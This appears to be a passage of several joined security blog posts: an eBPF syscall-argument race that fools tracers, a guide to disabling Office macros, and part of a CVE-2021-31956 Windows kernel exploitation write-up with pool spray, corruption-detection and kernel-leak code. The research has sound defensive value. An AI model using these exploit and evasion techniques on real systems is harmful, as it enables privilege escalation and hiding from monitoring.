  checker = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (checker == MAP_FAILED) {
    perror("mmap2");
    return 1;
  }

  strcpy(key, "supergood");
  strcpy(checker, "./checker");

  char count_str[32] = "0";

  char* nargv[] = {checker, key, count_str, NULL};

  pthread_t t_a;
  pthread_t t_b;
  if (mode == 1) {
    pthread_create(&t_a, NULL, &thread1, (void*)0);
    pthread_create(&t_b, NULL, &thread1, (void*)1);
  } else if (mode == 2) {
    pthread_create(&t_a, NULL, &thread2, NULL);
  }

  int c = 0;
  while(c < count) {
    snprintf(count_str, sizeof(count_str), "%d", c);

    int r = fork();
    if (r == 0) {
      int fd = open(key, 0);
      if (fd >= 0) {
        close(fd);
      }
      execve(checker, nargv, envp);
    } else {
      sleep(1);
    }
    c += 1;
  }
  return 0;
}
# ./dist/tracee-ebpf --trace event=execve,sched_process_exec
UID    COMM             PID     TID     RET              EVENT                ARGS
0      bash             7662    7662    0                execve               pathname: ./clobber, argv: [./clobber 5]
0      clobber          7662    7662    0                sched_process_exec   cmdpath: ./clobber, pathname: /root/clobber, argv: [./clobber 5], dev: 264241153, inode: 5391, invoked_from_kernel: 0
0      clobber          7665    7665    0                execve               argv: []
0      checker          7665    7665    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker rupergood 0], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7666    7666    0                execve               argv: []
0      checker          7666    7666    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallybad 1], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7667    7667    0                execve               argv: []
0      checker          7667    7667    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergood 2], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7668    7668    0                execve               argv: []
0      checker          7668    7668    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergbad 3], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7669    7669    0                execve               argv: []
0      checker          7669    7669    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallgood 4], dev: 264241153, inode: 5393, invoked_from_kernel: 0

Note: Interestingly enough, I only stumbled across this behavior because it would have been less effective to use in-process threads to clobber inputs to execve(2), since execve(2) kills all threads other than the one issuing the syscall. The open() call above exists primarily to trigger an example for the below test code to show how probes from sys_enter fail (with error -14, bad address), but succeed in the sys_exit hook.

SEC("raw_tracepoint/sys_enter")
int sys_enter_hook(struct bpf_raw_tracepoint_args *ctx) {
  struct pt_regs _regs;
  bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]);
  int id = _regs.orig_ax;
  char buf[128];
  if (id == 257) {
    char* const pathname = (char* const)_regs.si;
    bpf_printk("sys_enter -> openat %p\n", pathname);
    bpf_probe_read_str(buf, sizeof(buf), (void*)pathname);
    bpf_printk("sys_enter -> openat %s\n", buf);
  } else if (id == 59) {
    char* const f = (char* const)_regs.di;
    bpf_printk("sys_exit -> execve %p\n", f);
    bpf_probe_read_str(buf, sizeof(buf), (void*)f);
    bpf_printk("sys_exit -> execve %s\n", buf);
  }

  return 0;
}

SEC("raw_tracepoint/sys_exit")
int sys_exit_hook(struct bpf_raw_tracepoint_args *ctx) {
  struct pt_regs _regs;
  bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]);
  int id = _regs.orig_ax;
  char buf[128];
  if (id == 257) {
    char* const pathname = (char* const)_regs.si;
    bpf_printk("sys_exit -> openat %p\n", pathname);
    bpf_probe_read_str(buf, sizeof(buf), (void*)pathname);
    bpf_printk("sys_exit -> openat %s\n", buf);
  } else if (id == 59) {
    char* const f = (char* const)_regs.di;
    bpf_printk("sys_exit -> execve %p\n", f);
    bpf_probe_read_str(buf, sizeof(buf), (void*)f);
    bpf_printk("sys_exit -> execve %s\n", buf);
  }

  return 0;
}
# cat /sys/kernel/tracing/trace_pipe
...
<...>-215084  [000] .... 2266209.468617: 0: sys_enter -> openat 000000005ec00ae4
<...>-215084  [000] .N.. 2266209.468645: 0: sys_enter -> openat
<...>-215084  [000] .... 2266209.469091: 0: sys_exit -> openat 000000005ec00ae4
<...>-215084  [000] .N.. 2266209.469114: 0: sys_exit -> openat supelybad
<...>-215084  [000] .... 2266209.469199: 0: sys_exit -> execve 0000000031d15ade
<...>-215084  [000] .N.. 2266209.469222: 0: sys_exit -> execve
<...>-215084  [000] .... 2266209.470178: 0: sys_exit -> execve 0000000000000000
<...>-215084  [000] .N.. 2266209.470224: 0: sys_exit -> execve
<...>-215084  [000] .... 2266209.472093: 0: sys_enter -> openat 000000008edac6ac
<...>-215084  [000] .N.. 2266209.472138: 0: sys_enter -> openat /etc/ld.so.cache
<...>-215084  [000] .... 2266209.472205: 0: sys_exit -> openat 000000008edac6ac
<...>-215084  [000] .N.. 2266209.472248: 0: sys_exit -> openat /etc/ld.so.cache
<...>-215084  [000] .... 2266209.472345: 0: sys_enter -> openat 000000007671a9c9
<...>-215084  [000] .N.. 2266209.472366: 0: sys_enter -> openat /lib/x86_64-linux-gnu/libc.so.6
<...>-215084  [000] .... 2266209.472420: 0: sys_exit -> openat 000000007671a9c9
<...>-215084  [000] .N.. 2266209.472440: 0: sys_exit -> openat /lib/x86_64-linux-gnu/libc.so.6
...

Current Thoughts

If you want accurate tracing for syscall events, you probably shouldn’t be hooking the actual syscalls, and especially not the syscall tracepoints. Instead, your only real option is to figure out how to dump the arguments from the internals of a given syscall implementation. Depending on whether there are proper hook-points (e.g. tracepoints, LSM hooks, etc.) and whether they provide access to all arguments, it may be necessary to hook internal kernel functions with kprobes for absolute correctness, if it is at all possible in the first place. For what it’s worth, this is mostly a problem with Linux itself and not something that kprobe-ing from kernel modules can fix; though kernel modules can properly handle kernel structs beyond basic complexity, unlike eBPF.

In the case of security event auditing, correctness supersedes ease of development, but vendors may not be making that choice, at least not initially. Due to this, auditors must be aware of how their analysis tools actually work and how (and from where) they source event information, so that they can treat the output with a sizable hunk of salt where necessary because, while the tools are likely not lying, they may not be capable of telling the truth either.


  1. Olsen, Andy. “Fast and Easy pTracing with eBPF (and not ptrace)” NCC Group Open Forum, NCC Group, September 2019, New York, NY. Presentation.

  2. Dileo, Jeff; Olsen, Andy. “Kernel Tracing With eBPF: Unlocking God Mode on Linux” 35th Chaos Communication Congress (35C3), Chaos Computer Club (CCC), 30 December 2018, Leipziger Messe, Leipzig, Germany. Conference Presentation.

  3. https://media.ccc.de/v/35c3-9532-kernel_tracing_with_ebpf

  4. https://capsule8.com/blog/auditd-what-is-the-linux-auditing-system/

Disabling Office Macros to Reduce Malware Infections

16 August 2021 at 17:38

Category:  Reduction/Prevention

Overview

Document macros have gone in and out of style since 1995 as a deployment method for malware. Netskope’s latest ‘Cloud and Threat Report: July 2021 Edition’ points out that in Q2 of 2021, Microsoft Office macros accounted for 43% of malicious Office document downloads, compared to just 20% at the beginning of 2020. Malicious Office documents, aka maldocs, have continued to be an issue for organizations. Emotet, a successful malware family taken down in 2020, heavily used Office macros to infect Microsoft Windows systems. Other malware groups seem to have taken a page from the Emotet playbook and increased the use of macros in their recent campaigns of 2021. Today let us take a look at the various methods of detection and prevention of malicious macros.

Enabled Macros by Default

Microsoft Office by default allows a user to enable content and allow macros to run when opening Office documents like Word, Excel, and even PowerPoint. Macros and enabled content are rarely used by most users; typically only a handful of users need them, often for Excel financial calculations. Most organizations are scared or uncertain about what will break if macros are disabled. Creating a communication plan informing the organization about the upcoming change, and providing a way for users to request and justify the need for macros, get any needed approvals, and receive required training, can help avoid significant adverse impacts to the organization once implemented.

Detection

Detecting the use of macros within Office programs is not easy as there are no logging events associated with macro usage. The only option is to look for programs executed after the launch of Office programs. Often malware will use the macro to launch a scripting engine such as cscript or wscript, or another scripting language; PowerShell, WMI, and other administrative Windows utilities have also been used in this context. Endpoint Detection and Response (EDR) solutions usually monitor these parent-child relationships and trigger when Office documents attempt to execute nonstandard programs. Similarly, an organization with robust and proper logging of endpoint behavior can build detections within their log management or SIEM solution to highlight odd Office document executions.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious Office documents crippling an organization with malware or ransomware is to disable Office macros and create an allow list for users that absolutely need macros or enabled content. Users with exceptions to run macros or enabled content should be a priority to monitor for maldoc behavior through suspicious parent-child Office executions.

Blocking all Office documents from coming into the organization is not feasible due to the widespread usage of Microsoft Office products. However, some email scanning gateways offer maldoc scanning at an additional cost and can effectively reduce the sheer quantity of malicious Office documents an organization receives.  Alternatively, implementing an EDR solution is also a viable option.

Disabling Office macros is the easiest option as it is FREE and already built into Microsoft Active Directory as a Group Policy object. The image below depicts the setting to disable Office macros.

Organizations can utilize user groups for those exceptions that still require macro functionality. However, keep in mind that those specific users should be provided additional awareness training on the ramifications of opening malicious Office documents and enabling content.

Use the Registry to block macros

For those that do not have Active Directory, blocking macros can also be achieved by adding a registry setting to each system to disable macro usage. Set the following keys to achieve macro blocking and be sure to adjust the appropriate Office version, e.g., “15.0, 16.0, etc.”:

  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\office\<16.0>\word\security
  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\office\<16.0>\excel\security
  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\office\<16.0>\powerpoint\security

In each key listed above, create the following value:

  • DWORD: blockcontentexecutionfrominternet
    • Value = 1
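
For environments where scripting the change is preferable to manual registry edits, the following is a minimal sketch using the Win32 registry API to create the value for a single Office application. The Office version ("16.0") and application subkey ("word") are placeholders and need adjusting per the list above:

// reg_block_macros.c - sketch: sets blockcontentexecutionfrominternet=1 for Word (Office 16.0).
// Adjust the version ("16.0") and application ("word") to match the keys listed above.
#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "advapi32.lib")

int main(void)
{
    const char *subkey = "SOFTWARE\\Policies\\Microsoft\\office\\16.0\\word\\security";
    HKEY hKey;
    DWORD value = 1;

    LONG rc = RegCreateKeyExA(HKEY_CURRENT_USER, subkey, 0, NULL,
                              REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL,
                              &hKey, NULL);
    if (rc != ERROR_SUCCESS) {
        printf("RegCreateKeyExA failed: %ld\n", rc);
        return 1;
    }

    rc = RegSetValueExA(hKey, "blockcontentexecutionfrominternet", 0, REG_DWORD,
                        (const BYTE *)&value, sizeof(value));
    if (rc != ERROR_SUCCESS) {
        printf("RegSetValueExA failed: %ld\n", rc);
        RegCloseKey(hKey);
        return 1;
    }

    RegCloseKey(hKey);
    puts("Macro blocking value set for Word.");
    return 0;
}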

Conclusion

We hope this blog entry helps provide an option to reduce the risk of infection from ever-increasing malicious Office documents and some things to consider when implementing the change.  With some preparation, communication, and education, an organization can reduce the likelihood of getting infected by maldocs with an existing FREE option available to all Windows users.

References and Additional Reading

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within a separate blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice, for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to read from and write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming for is as follows:

The difficulty with this is that, due to low fragmentation heap (LFH) randomisation, reliably achieving this memory layout is harder; the first iteration of this exploit stayed away from this approach until more research had been performed into improving general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absence of an LFH "Heap Randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what clean-up needs to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which, when added to the 0x10 header and the POOL_HEADER (0x10), also ends up in an allocated chunk of 0xC0).
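
As a rough sketch of what such a spray can look like (this is illustrative rather than the exact code from part 1), the NtCreateWnfStateName and NtUpdateWnfStateData native APIs are used; the prototypes and enum values below are undocumented and taken from publicly available reverse-engineered headers such as phnt, so they may differ between builds, and the function and buffer names are arbitrary:

// Sketch only: spraying _WNF_STATE_DATA objects into the 0xC0 LFH bucket.
// Prototypes/constants from public reverse-engineered headers (e.g. phnt); verify per build.
#include <windows.h>
#include <winternl.h>
#include <string.h>

typedef struct _MY_WNF_STATE_NAME { ULONGLONG Data; } MY_WNF_STATE_NAME;

typedef NTSTATUS(NTAPI *NtCreateWnfStateName_t)(
    MY_WNF_STATE_NAME *StateName, ULONG NameLifetime, ULONG DataScope,
    BOOLEAN PersistData, PVOID TypeId, ULONG MaximumStateSize,
    PSECURITY_DESCRIPTOR SecurityDescriptor);

typedef NTSTATUS(NTAPI *NtUpdateWnfStateData_t)(
    MY_WNF_STATE_NAME *StateName, const VOID *Buffer, ULONG Length,
    PVOID TypeId, const VOID *ExplicitScope, ULONG MatchingChangeStamp,
    ULONG CheckStamp);

#define SPRAY_COUNT     0x800   // arbitrary example count
#define STATE_DATA_SIZE 0xA0    // 0xA0 data + 0x10 header + 0x10 POOL_HEADER = 0xC0 chunk

static MY_WNF_STATE_NAME g_names[SPRAY_COUNT];

void SprayWnfStateData(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtCreateWnfStateName_t pNtCreateWnfStateName =
        (NtCreateWnfStateName_t)GetProcAddress(ntdll, "NtCreateWnfStateName");
    NtUpdateWnfStateData_t pNtUpdateWnfStateData =
        (NtUpdateWnfStateData_t)GetProcAddress(ntdll, "NtUpdateWnfStateData");

    // A NULL-DACL security descriptor so the temporary names can be created and updated freely.
    SECURITY_DESCRIPTOR sd;
    InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);

    UCHAR data[STATE_DATA_SIZE];
    memset(data, 0x41, sizeof(data));

    for (int i = 0; i < SPRAY_COUNT; i++) {
        // 3 = WnfTemporaryStateName, 4 = WnfDataScopeMachine (values from public headers)
        if (pNtCreateWnfStateName(&g_names[i], 3, 4, FALSE, NULL, 0x1000, &sd) != 0)
            continue;
        // Each update allocates a _WNF_STATE_DATA of AllocatedSize 0xA0 from the paged pool.
        pNtUpdateWnfStateData(&g_names[i], data, sizeof(data), NULL, NULL, 0, 0);
    }
}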

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, as we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take the approach used in the previous article of freeing holes and then reusing them, because both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow and ensure that only the POOL_HEADER and the first 0x10 bytes of the adjacent object are overflowed, corrupting just the following fields.

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know whether we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and check for corruption by looping through and querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.
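
A rough sketch of that detection loop follows, reusing the hypothetical spray state (g_names, SPRAY_COUNT, STATE_DATA_SIZE) from the earlier sketch, with NtQueryWnfStateData's prototype again taken from public reverse-engineered headers:

// Sketch: loop over the sprayed state names looking for a corrupted DataSize.
typedef NTSTATUS(NTAPI *NtQueryWnfStateData_t)(
    MY_WNF_STATE_NAME *StateName, PVOID TypeId, const VOID *ExplicitScope,
    PULONG ChangeStamp, PVOID Buffer, PULONG BufferSize);

#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)

int FindCorruptedStateData(NtQueryWnfStateData_t pNtQueryWnfStateData)
{
    UCHAR buffer[0x1000];

    for (int i = 0; i < SPRAY_COUNT; i++) {
        ULONG changeStamp = 0;
        ULONG size = sizeof(buffer);

        NTSTATUS status = pNtQueryWnfStateData(&g_names[i], NULL, NULL,
                                               &changeStamp, buffer, &size);

        // An intact entry returns exactly the 0xA0 bytes we stored; a corrupted
        // DataSize reports back something larger, giving a relative read over
        // the 0xC0 pool subsegment.
        if ((status == 0 && size > STATE_DATA_SIZE) || status == STATUS_BUFFER_TOO_SMALL)
            return i;
    }
    return -1; // no corruption observed - trigger the spray and overflow again
}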

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally the chunk containing our unbounded _WNF_STATE_DATA can be allocated as the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall, with 1) remediated and 2) and 3) only occurring very rarely, in the absence of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above and within the first blog post, we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.
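
A sketch of such a scan, assuming the unbounded relative read has already copied the adjacent pool memory into a local buffer, could look like the following; the offsets correspond to the _WNF_NAME_INSTANCE layout dumped above, and the function itself is illustrative rather than taken from the exploit:

// Sketch: locate an adjacent _WNF_NAME_INSTANCE within the relative-read window
// and pull out the members of interest. "window" is assumed to hold the bytes
// returned by querying the unbounded _WNF_STATE_DATA.
typedef unsigned long long QWORD;

int FindAdjacentNameInstance(const UCHAR *window, SIZE_T windowSize,
                             QWORD *CreatorProcess, QWORD *StateName,
                             QWORD *ScopeInstance, SIZE_T *StateDataOffset)
{
    for (SIZE_T i = 0; i + 0xA0 <= windowSize; i++) {
        // Match the _WNF_NODE_HEADER bytes quoted above ("\x03\x09\xa8")
        if (window[i] == 0x03 && window[i + 1] == 0x09 && window[i + 2] == 0xA8) {
            *StateName       = *(const QWORD *)(window + i + 0x28);
            *ScopeInstance   = *(const QWORD *)(window + i + 0x30);
            *StateDataOffset = i + 0x58;   // later targeted by the relative write
            *CreatorProcess  = *(const QWORD *)(window + i + 0x98);
            return 1;
        }
    }
    return 0;
}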

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize and DataSize fields preceding the data we wish to read or write.

In this case the aim was to achieve a full arbitrary read and write, but without the constraint of needing to find sane and reliable AllocatedSize and DataSize values directly preceding the memory we wished to write to.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structures are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture-specific details for low level operations and the HAL provides an abstraction layer to deal with differences between hardware.

Processes and threads are represented at both the executive and kernel "layers" within kernel memory as _EPROCESS and _KPROCESS, and _ETHREAD and _KTHREAD structures, respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is set to 0 (KernelMode) for a user-mode thread, then the address validation is skipped and kernel memory space addresses can be written to:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

